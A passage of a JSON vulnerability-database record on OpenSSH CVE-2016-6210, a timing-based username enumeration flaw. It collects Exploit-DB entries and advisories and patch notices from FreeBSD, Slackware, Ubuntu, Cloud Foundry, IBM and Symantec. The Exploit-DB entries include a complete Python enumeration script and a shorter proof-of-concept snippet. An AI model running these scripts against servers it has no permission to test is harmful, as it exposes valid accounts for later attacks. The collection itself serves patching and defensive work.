"cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/25440"}], "exploitdb": [{"lastseen": "2016-07-20T21:22:08", "description": "OpenSSHD. CVE-2016-6210. Remote exploit for Linux platform", "published": "2016-07-20T00:00:00", "type": "exploitdb", "title": "OpenSSHD <= 7.2p2 - Username Enumeration", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6210"], "modified": "2016-07-20T00:00:00", "id": "EDB-ID:40136", "href": "https://www.exploit-db.com/exploits/40136/", "sourceData": "#!/usr/bin/python\r\n#\r\n# CVEs: CVE-2016-6210 (Credits for this go to Eddie Harari)\r\n#\r\n# Author: 0_o -- null_null\r\n# nu11.nu11 [at] yahoo.com\r\n# Oh, and it is n-u-one-one.n-u-one-one, no l's...\r\n# Wonder how the guys at packet storm could get this wrong :(\r\n# \r\n# Date: 2016-07-19\r\n# \r\n# Purpose: User name enumeration against SSH daemons affected by CVE-2016-6210. \r\n# \r\n# Prerequisites: Network access to the SSH daemon.\r\n#\r\n# DISCLAIMER: Use against your own hosts only! Attacking stuff you are not \r\n# permitted to may put you in big trouble!\r\n#\r\n# And now - the fun part :-)\r\n# \r\n\r\n\r\nimport paramiko\r\nimport time\r\nimport numpy\r\nimport argparse\r\nimport sys\r\n\r\nargs = None\r\n\r\nclass bcolors:\r\n HEADER = '\\033[95m'\r\n OKBLUE = '\\033[94m'\r\n OKGREEN = '\\033[92m'\r\n WARNING = '\\033[93m'\r\n FAIL = '\\033[91m'\r\n ENDC = '\\033[0m'\r\n BOLD = '\\033[1m'\r\n UNDERLINE = '\\033[4m'\r\n\r\n\r\ndef get_args():\r\n parser = argparse.ArgumentParser()\r\n group = parser.add_mutually_exclusive_group()\r\n parser.add_argument(\"host\", type = str, help = \"Give SSH server address like ip:port or just by ip\")\r\n group.add_argument(\"-u\", \"--user\", type = str, help = \"Give a single user name\")\r\n group.add_argument(\"-U\", \"--userlist\", type = str, help = \"Give a file containing a list of users\")\r\n parser.add_argument(\"-e\", \"--enumerated\", action = \"store_true\", help = \"Only show enumerated users\")\r\n parser.add_argument(\"-s\", \"--silent\", action = \"store_true\", help = \"Like -e, but just the user names will be written to stdout (no banner, no anything)\")\r\n parser.add_argument(\"--bytes\", default = 50000, type = int, help = \"Send so many BYTES to the SSH daemon as a password\")\r\n parser.add_argument(\"--samples\", default = 12, type = int, help = \"Collect so many SAMPLES to calculate a timing baseline for authenticating non-existing users\")\r\n parser.add_argument(\"--factor\", default = 3.0, type = float, help = \"Used to compute the upper timing boundary for user enumeration\")\r\n parser.add_argument(\"--trials\", default = 1, type = int, help = \"try to authenticate user X for TRIALS times and compare the mean of auth timings against the timing boundary\")\r\n args = parser.parse_args()\r\n return args\r\n\r\n\r\ndef get_banner(host, port):\r\n ssh = paramiko.SSHClient()\r\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n try:\r\n ssh.connect(hostname = host, port = port, username = 'invalidinvalidinvalid', password = 'invalidinvalidinvalid')\r\n except:\r\n banner = ssh.get_transport().remote_version\r\n ssh.close()\r\n return banner\r\n\r\n\r\ndef connect(host, port, user):\r\n global args\r\n starttime = 0.0\r\n endtime = 0.0\r\n p = 'B' * int(args.bytes)\r\n ssh = paramiko.SSHClient()\r\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n starttime=time.clock()\r\n try:\r\n ssh.connect(hostname = host, port = port, username = user, password = p, look_for_keys = False, gss_auth = False, gss_kex = False, gss_deleg_creds = False, gss_host = None, allow_agent = False)\r\n except:\r\n endtime=time.clock()\r\n finally:\r\n ssh.close()\r\n return endtime - starttime\r\n\r\n\r\n\r\ndef main():\r\n global args\r\n args = get_args()\r\n if not args.silent: print(\"\\n\\nUser name enumeration against SSH daemons affected by CVE-2016-6210\")\r\n if not args.silent: print(\"Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by Eddie Harari\\n\\n\")\r\n if args.host:\r\n host = args.host.split(\":\")[0]\r\n try:\r\n port = int(args.host.split(\":\")[1])\r\n except IndexError:\r\n port = 22\r\n users = []\r\n if args.user:\r\n users.append(args.user)\r\n elif args.userlist:\r\n with open(args.userlist, \"r\") as f:\r\n users = f.readlines()\r\n else:\r\n if not args.silent: print(bcolors.FAIL + \"[!] \" + bcolors.ENDC + \"You must give a user or a list of users\")\r\n sys.exit()\r\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Testing SSHD at: \" + bcolors.BOLD + str(host) + \":\" + str(port) + bcolors.ENDC + \", Banner: \" + bcolors.BOLD + get_banner(host, port) + bcolors.ENDC)\r\n # get baseline timing for non-existing users...\r\n baseline_samples = []\r\n baseline_mean = 0.0\r\n baseline_deviation = 0.0\r\n if not args.silent: sys.stdout.write(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Getting baseline timing for authenticating non-existing users\")\r\n for i in range(1, int(args.samples) + 1):\r\n if not args.silent: sys.stdout.write('.')\r\n if not args.silent: sys.stdout.flush()\r\n sample = connect(host, port, 'foobar-bleh-nonsense' + str(i))\r\n baseline_samples.append(sample)\r\n if not args.silent: sys.stdout.write('\\n')\r\n # remove the biggest and smallest value\r\n baseline_samples.sort()\r\n baseline_samples.pop()\r\n baseline_samples.reverse()\r\n baseline_samples.pop()\r\n # do math\r\n baseline_mean = numpy.mean(numpy.array(baseline_samples))\r\n baseline_deviation = numpy.std(numpy.array(baseline_samples))\r\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Baseline mean for host \" + host + \" is \" + str(baseline_mean) + \" seconds.\")\r\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Baseline variation for host \" + host + \" is \" + str(baseline_deviation) + \" seconds.\")\r\n upper = baseline_mean + float(args.factor) * baseline_deviation\r\n if not args.silent: print(bcolors.WARNING + \"[*] \" + bcolors.ENDC + \"Defining timing of x < \" + str(upper) + \" as non-existing user.\")\r\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Testing your users...\")\r\n # \r\n # Get timing for the given user name...\r\n #\r\n for u in users:\r\n user = u.strip()\r\n enum_samples = []\r\n enum_mean = 0.0\r\n for t in range(0, int(args.trials)):\r\n timeval = connect(host, port, user)\r\n enum_samples.append(timeval)\r\n enum_mean = numpy.mean(numpy.array(enum_samples))\r\n if (enum_mean < upper):\r\n if not (args.enumerated or args.silent) : \r\n print(bcolors.FAIL + \"[-] \" + bcolors.ENDC + user + \" - timing: \" + str(enum_mean))\r\n else:\r\n if not args.silent: \r\n print(bcolors.OKGREEN + \"[+] \" + bcolors.ENDC + user + \" - timing: \" + str(enum_mean))\r\n else: \r\n print(user)\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40136/"}, {"lastseen": "2016-07-18T13:28:25", "description": "OpenSSHD <= 7.2p2 - User Enumeration. CVE-2016-6210. Remote exploit for Linux platform", "published": "2016-07-18T00:00:00", "type": "exploitdb", "title": "OpenSSHD <= 7.2p2 - User Enumeration", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6210"], "modified": "2016-07-18T00:00:00", "id": "EDB-ID:40113", "href": "https://www.exploit-db.com/exploits/40113/", "sourceData": "Source: http://seclists.org/fulldisclosure/2016/Jul/51\r\n\r\n--------------------------------------------------------------------\r\nUser Enumeration using Open SSHD (<=Latest version).\r\n-------------------------------------------------------------------\r\n\r\nAbstract:\r\n-----------\r\nBy sending large passwords, a remote user can enumerate users on system that runs SSHD. This problem exists in most \r\nmodern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash.\r\n\r\nCVE-ID\r\n---------\r\nCVE-2016-6210\r\n\r\nTested versions\r\n--------------------\r\nThis issue was tested on : opensshd-7.2p2 ( should be possible on most earlier versions as well).\r\n\r\nFix\r\n-----------------\r\nThis issue was reported to OPENSSH developer group and they have sent a patch ( don't know if patch was released yet).\r\n(thanks to 'dtucker () zip com au' for his quick reply and fix suggestion).\r\n\r\nDetails\r\n----------------\r\nWhen SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD \r\nsource code. On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm.\r\nIf real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter \r\nresponse time from the server for non-existing users.\r\n\r\nSample code:\r\n----------------\r\nimport paramiko\r\nimport time\r\nuser=raw_input(\"user: \")\r\np='A'*25000\r\nssh = paramiko.SSHClient()\r\nstarttime=time.clock()\r\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\ntry:\r\n ssh.connect('127.0.0.1', username=user,\r\n password=p)\r\nexcept:\r\n endtime=time.clock()\r\ntotal=endtime-starttime\r\nprint(total)\r\n\r\n(Valid users will result in higher total time).\r\n\r\n*** please note that if SSHD configuration prohibits root login , then root is not considered as valid user...\r\n\r\n*** when TCP timestamp option is enabled the best way to measure the time would be using timestamps from the TCP \r\npackets of the server, since this will eliminate any network delays on the way.\r\n\r\nEddie Harari", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40113/"}], "freebsd": [{"lastseen": "2019-05-29T18:32:32", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8325", "CVE-2016-6210"], "description": "\nThe OpenSSH project reports:\n\n* sshd(8): Mitigate timing differences in password authentication\n\t that could be used to discern valid from invalid account names\n\t when long passwords were sent and particular password hashing\n\t algorithms are in use on the server. CVE-2016-6210, reported by\n\t EddieEzra.Harari at verint.com\n\t \n * sshd(8): (portable only) Ignore PAM environment vars when\n\t UseLogin=yes. If PAM is configured to read user-specified\n\t environment variables and UseLogin=yes in sshd_config, then a\n\t hostile local user may attack /bin/login via LD_PRELOAD or\n\t similar environment variables set via PAM. CVE-2015-8325,\n\t found by Shayan Sadigh.\n\t \n\n", "edition": 4, "modified": "2016-08-01T00:00:00", "published": "2016-08-01T00:00:00", "id": "ADCCEFD1-7080-11E6-A2CB-C80AA9043978", "href": "https://vuxml.freebsd.org/freebsd/adccefd1-7080-11e6-a2cb-c80aa9043978.html", "title": "openssh -- sshd -- remote valid user discovery and PAM /bin/login attack", "type": "freebsd", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2020-10-25T16:36:19", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8325", "CVE-2016-6210"], "description": "New openssh packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\n14.2, and -current to fix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/openssh-7.3p1-i586-1_slack14.2.txz: Upgraded.\n This is primarily a bugfix release, and also addresses security issues.\n sshd(8): Mitigate a potential denial-of-service attack against the system's\n crypt(3) function via sshd(8).\n sshd(8): Mitigate timing differences in password authentication that could\n be used to discern valid from invalid account names when long passwords were\n sent and particular password hashing algorithms are in use on the server.\n ssh(1), sshd(8): Fix observable timing weakness in the CBC padding oracle\n countermeasures.\n ssh(1), sshd(8): Improve operation ordering of MAC verification for\n Encrypt-then-MAC (EtM) mode transport MAC algorithms to verify the MAC\n before decrypting any ciphertext.\n sshd(8): (portable only) Ignore PAM environment vars when UseLogin=yes.\n For more information, see:\n http://www.openssh.com/txt/release-7.3\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6210\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8325\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssh-7.3p1-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssh-7.3p1-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssh-7.3p1-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssh-7.3p1-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssh-7.3p1-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssh-7.3p1-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssh-7.3p1-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssh-7.3p1-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssh-7.3p1-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssh-7.3p1-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/openssh-7.3p1-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/openssh-7.3p1-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssh-7.3p1-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssh-7.3p1-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\n926a45f63599a8f7d559039220f2773c openssh-7.3p1-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n2f18a3adf8ed54e59ac0c0740b138a67 openssh-7.3p1-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n7f5e48238b26237b9c2542a3d34847b6 openssh-7.3p1-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\ne277d7c7865fd46bc48ac128849d6426 openssh-7.3p1-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n17c49c75c5d2b6ad49e0d2352fd2e922 openssh-7.3p1-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n6305b5ce1ce3a4390a56c36eca6920cc openssh-7.3p1-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n508dbde12ca36275d305ad1014f12066 openssh-7.3p1-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n699e2c1d8d7383ba2137e9ead9001be2 openssh-7.3p1-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n6a2a5dca4d9334c70239c20bfed92791 openssh-7.3p1-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\neb14e40f2c50beb19ccf1aaccbaf416d openssh-7.3p1-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n624fbc40486642443292ffdaaffba640 openssh-7.3p1-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\nc0e4d51dfb3722aa69e008389f4f089d openssh-7.3p1-x86_64-1_slack14.2.txz\n\nSlackware -current package:\ne9109896f7640f872e3695603579954f n/openssh-7.3p1-i586-1.txz\n\nSlackware x86_64 -current package:\nbcf65b51088b5b7f1dc55bab1ef63684 n/openssh-7.3p1-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg openssh-7.3p1-i586-1_slack14.2.txz\n\nNext, restart the sshd daemon:\n > sh /etc/rc.d/rc.sshd restart", "modified": "2016-08-06T21:10:35", "published": "2016-08-06T21:10:35", "id": "SSA-2016-219-03", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.613746", "type": "slackware", "title": "[slackware-security] openssh", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:39:38", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6515", "CVE-2016-6210"], "description": "Eddie Harari discovered that OpenSSH incorrectly handled password hashing \nwhen authenticating non-existing users. A remote attacker could perform a \ntiming attack and enumerate valid users. (CVE-2016-6210)\n\nTomas Kuthan, Andres Rojas, and Javier Nieto discovered that OpenSSH did \nnot limit password lengths. A remote attacker could use this issue to cause \nOpenSSH to consume resources, leading to a denial of service. \n(CVE-2016-6515)", "edition": 5, "modified": "2016-08-15T00:00:00", "published": "2016-08-15T00:00:00", "id": "USN-3061-1", "href": "https://ubuntu.com/security/notices/USN-3061-1", "title": "OpenSSH vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:53", "bulletinFamily": "software", "cvelist": ["CVE-2016-6515", "CVE-2016-6210"], "description": "USN-3061-1 OpenSSH vulnerability\n\n# \n\nMedium\n\n# Vendor\n\nCanonical Ubuntu, openssh\n\n# Versions Affected\n\nCanonical Ubuntu 14.04 LTS\n\n# Description\n\nEddie Harari discovered that OpenSSH incorrectly handled password hashing when authenticating non-existing users. A remote attacker could perform a timing attack and enumerate valid users. ([CVE-2016-6210](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6210.html>))\n\nTomas Kuthan, Andres Rojas, and Javier Nieto discovered that OpenSSH did not limit password lengths. A remote attacker could use this issue to cause OpenSSH to consume resources, leading to a denial of service. ([CVE-2016-6515](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6515.html>))\n\n# Affected Products and Versions\n\n_Severity is medium unless otherwise noted. \n_\n\n * Cloud Foundry BOSH stemcells 3146.x versions prior to 3146.20 AND 3232.x versions prior to 3232.17 AND other versions prior to 3262.8 are vulnerable\n * All versions of Cloud Foundry cflinuxfs2 prior to v.1.75.0\n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry team has released patched BOSH stemcells 3146.20 and 3232.17 with an upgraded Linux kernel that resolves the aforementioned issues. We recommend that Operators upgrade BOSH stemcell 3146.x versions to 3146.20 OR 3232.x versions to 3232.17\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 v.1.75.0 or later versions3232\n\n# Credit\n\nEddie Harari, Tomas Kuthan, Javier Nieto, and Andres Rojas\n\n# References\n\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6210.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6515.html>\n", "edition": 5, "modified": "2016-08-25T00:00:00", "published": "2016-08-25T00:00:00", "id": "CFOUNDRY:3C7597DAEB0A160E9DA1752927007C7C", "href": "https://www.cloudfoundry.org/blog/usn-3061-1/", "title": "USN-3061-1 OpenSSH vulnerability | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "aix": [{"lastseen": "2019-05-29T19:19:13", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8325", "CVE-2016-6515", "CVE-2016-6210"], "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Thu Sep 8 14:36:37 CDT 2016\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/openssh_advisory9.asc\nhttps://aix.software.ibm.com/aix/efixes/security/openssh_advisory9.asc\nftp://aix.software.ibm.com/aix/efixes/security/openssh_advisory9.asc\n\nSecurity Bulletin: Vulnerabilities in OpenSSH affect AIX (CVE-2015-8325,\nCVE-2016-6210 and CVE-2016-6515)\n \n \n===============================================================================\n\nSUMMARY:\n\nVulnerabilities in OpenSSH affect AIX\n \n \n===============================================================================\n\nVULNERABILITY DETAILS:\n\n CVEID: CVE-2015-8325\n DESCRIPTION: When the UseLogin feature is enabled and PAM is configured to \n read .pam_environment files in user home directories, allows local users \n to gain privileges by triggering a crafted environment for the /bin/login \n program, as demonstrated by an LD_PRELOAD environment variable.\n CVSS Base Score: 7.4\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/114628 for the \n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n \n CVEID: CVE-2016-6210\n DESCRIPTION: An attacker can measure timing differences in password \n authentication that could be used to discern valid from invalid account \n names when long passwords were sent and particular password hashing\n algorithms are in use on the server \n CVSS Base Score: 4.3\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/115128 for the \n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n \n CVEID: CVE-2016-6515\n DESCRIPTION: sshd does not limit password lengths for password authentication, \n which allows remote attackers to cause a denial of service \n (crypt CPU consumption) via a long string. \n CVSS Base Score: 7.5 \n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/115911 for the \n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n \n AFFECTED PRODUCTS AND VERSION:\n \n AIX 5.3, 6.1, 7.1, 7.2\n VIOS 2.2.x\n \n The following fileset levels are vulnerable:\n \n key_fileset = osrcaix\n \n Fileset Lower Level Upper Level KEY\n -------------------------------------------------------------\n openssh.base.client 4.0.0.5200 6.0.0.6202 key_w_fs\n openssh.base.server 4.0.0.5200 6.0.0.6202 key_w_fs\n \n Note: To determine if your system is vulnerable, execute the\n following commands:\n\n lslpp -L | grep -i openssh.base.client\n lslpp -L | grep -i openssh.base.server\n\n \n REMEDIATION:\n\n A. FIXES\n\n Fixes are available. The fixes can be downloaded via ftp and\n http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/openssh_fix9.tar\n http://aix.software.ibm.com/aix/efixes/security/openssh_fix9.tar\n https://aix.software.ibm.com/aix/efixes/security/openssh_fix9.tar\n\n The link above is to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n releases.\n\n Note that the tar file contains Interim fixes that are based on\n OpenSSH version as given below - \n\n You must be on the 'prereq for installation' level before\n applying the interim fix. This may require installing a new\n level(prereq version) first.\n \n\n AIX Level Interim Fix (*.Z) Fileset Name(prereq for installation) KEY\n --------------------------------------------------------------------------------------------\n 5.3, 6.1, 7.1, 7.2 6202_ifix.160830.epkg.Z openssh.base(6.0.0.6202 version) key_w_fix\n\n VIOS Level Interim Fix (*.Z) Fileset Name(prereq for installation) KEY\n ----------------------------------------------------------------------------------------\n 2.2.* 6202_ifix.160830.epkg.Z openssh.base(6.0.0.6202 version) key_w_fix\n\n\n Latest level of OpenSSH fileset is available from the web download site:\n https://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=aixbp&lang=en_US&S_PKG=openssh&cp=UTF-8\n\n \n To extract the fix from the tar file:\n\n tar xvf openssh_fix9.tar\n cd openssh_fix9\n\n Verify you have retrieved the fix intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command is the followng:\n\n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n d7d9c1dd5cfb8687a641daab19254f24e6ab4f2677f263acd21742e42ff02a50 6202_ifix.160830.epkg.Z key_w_csum\n\n \n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the integrity\n of the fixes. If the sums or signatures cannot be confirmed,\n contact IBM AIX Security at security-alert@austin.ibm.com and\n describe the discrepancy.\n \n Published advisory OpenSSL signature file location:\n\n http://aix.software.ibm.com/aix/efixes/security/openssh_advisory9.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/openssh_advisory9.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/openssh_advisory9.asc.sig \n\n openssl dgst -sha1 -verify <pubkey_file> -signature\n <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature\n <ifix_file>.sig <ifix_file>\n \n\n \n \n B. FIX AND INTERIM FIX INSTALLATION\n\n After applying fix, IBM recommends that you regenerate your SSH keys as\n a precaution. \n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n\n WORKAROUNDS AND MITIGATIONS:\n \n None.\n \n \n===============================================================================\n\nCONTACT US:\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team via security-alert@austin.ibm.com you\n can either:\n\n A. Download the key from our web page:\n\nhttp://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n\n Note: Keywords labeled as KEY in this document are used for parsing purposes.\n\n eServer is a trademark of International Business Machines\n Corporation. IBM, AIX and pSeries are registered trademarks of\n International Business Machines Corporation. All other trademarks\n are property of their respective holders.\n\n Complete CVSS v3 Guide: http://www.first.org/cvss/user-guide\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n\n X-Force Vulnerability Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/114628\n X-Force Vulnerability Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/115128\n X-Force Vulnerability Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/115911\n CVE-2015-8325 : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8325\n CVE-2016-6210 : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6210\n CVE-2016-6515 : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6515\n \n\nACKNOWLEDGEMENTS:\n\n None\n \n \nCHANGE HISTORY:\n\n First Issued: Thu Sep 8 14:36:37 CDT 2016\n\n\n===============================================================================\n\n *The CVSS Environment Score is customer environment specific and will\n ultimately impact the Overall CVSS Score. Customers can evaluate the\n impact of this vulnerability in their environments by accessing the links\n in the Reference section of this Flash.\n\n Note: According to the Forum of Incident Response and Security Teams\n (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\n open standard designed to convey vulnerability severity and help to\n determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\n MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE\n RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\n VULNERABILITY.\n \n\n", "edition": 4, "modified": "2016-09-08T14:36:37", "published": "2016-09-08T14:36:37", "id": "OPENSSH_ADVISORY9.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/openssh_advisory9.asc", "title": "AIX OpenSSH Vulnerability", "type": "aix", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "symantec": [{"lastseen": "2021-01-15T20:47:33", "bulletinFamily": "software", "cvelist": ["CVE-2016-6210", "CVE-2016-6515", "CVE-2016-8858"], "description": "### SUMMARY \n\nBlue Coat products using affected versions of OpenSSH are susceptible to several vulnerabilities. A remote attacker, with access to the management interface, can exploit these vulnerabilities to enumerate existing user accounts and cause denial of service through excessive CPU consumption and memory exhaustion. \n \n\n\n### AFFECTED PRODUCTS \n\nThe following products are vulnerable:\n\n**Advanced Secure Gateway (ASG)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-8858 | 6.7 | Not vulnerable, fixed in 6.7.2.1 \n6.6 | Upgrade to 6.6.5.4. \n \n \n\n**CacheFlow** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-8858 | 3.4 | Upgrade to 3.4.2.8. \n \n \n\n**Director** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-6515 | 6.1 | Upgrade to 6.1.23.1. \nCVE-2016-6210, CVE-2016-8858 | 6.1.22.1 only | 